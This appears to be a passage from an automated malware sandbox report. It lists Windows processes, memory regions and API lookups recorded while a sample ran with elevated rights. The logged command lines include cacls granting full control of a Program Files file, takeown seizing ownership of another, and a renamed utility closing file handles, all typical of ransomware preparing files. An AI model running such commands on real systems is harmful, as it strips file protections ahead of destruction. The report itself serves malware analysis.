| ntmarta.dll | 0x7ffaf37e0000 | 0x7ffaf3811fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #102: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #102 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:32, Reason: Child Process |
| Unmonitor | End Time: 00:04:41, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa2c |
| Parent PID | 0xf04 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F0
0x
9B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000f20000 | 0x00f20000 | 0x04f1ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x04f3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f20000 | 0x04f20000 | 0x04f2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f40000 | 0x04f40000 | 0x04f41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f40000 | 0x04f40000 | 0x04f43fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f50000 | 0x04f50000 | 0x04f63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x04feffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ff0000 | 0x04ff0000 | 0x04ff3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005000000 | 0x05000000 | 0x05000fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x05011fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x05020000 | 0x050ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000050e0000 | 0x050e0000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x05120000 | 0x05121fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005140000 | 0x05140000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005150000 | 0x05150000 | 0x053bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005150000 | 0x05150000 | 0x0518ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x052affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052c0000 | 0x052c0000 | 0x053bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x053c0000 | 0x056f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f480000 | 0x7f480000 | 0x7f57ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f580000 | 0x7f580000 | 0x7f5a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f5a8000 | 0x7f5a8000 | 0x7f5a8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5a9000 | 0x7f5a9000 | 0x7f5abfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5ac000 | 0x7f5ac000 | 0x7f5aefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5af000 | 0x7f5af000 | 0x7f5affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #103: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #103 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:33, Reason: Child Process |
| Unmonitor | End Time: 00:04:38, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x84 |
| Parent PID | 0xe4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
418
0x
F80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c90000 | 0x00c90000 | 0x04c8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04caffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c90000 | 0x04c90000 | 0x04c9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ca0000 | 0x04ca0000 | 0x04ca3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04cb1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04cb0000 | 0x04cb4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x04cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d60000 | 0x04d60000 | 0x04d63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d70000 | 0x04d70000 | 0x04d70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04d81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04d90000 | 0x04e4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04ed0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04eeffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04ef0000 | 0x04f19fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04ef0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x0526ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f80000 | 0x04f80000 | 0x05107fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005170000 | 0x05170000 | 0x0526ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005270000 | 0x05270000 | 0x053f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005400000 | 0x05400000 | 0x067fffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06800000 | 0x06b36fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e3a0000 | 0x7e3a0000 | 0x7e49ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e4a0000 | 0x7e4a0000 | 0x7e4c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e4c4000 | 0x7e4c4000 | 0x7e4c4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e4c8000 | 0x7e4c8000 | 0x7e4cafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e4cb000 | 0x7e4cb000 | 0x7e4cbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e4cd000 | 0x7e4cd000 | 0x7e4cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #104: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #104 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:33, Reason: Child Process |
| Unmonitor | End Time: 00:04:38, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x708 |
| Parent PID | 0x804 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
120
0x
700
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00877fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00a00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x01e0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74380000 | 0x74411fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
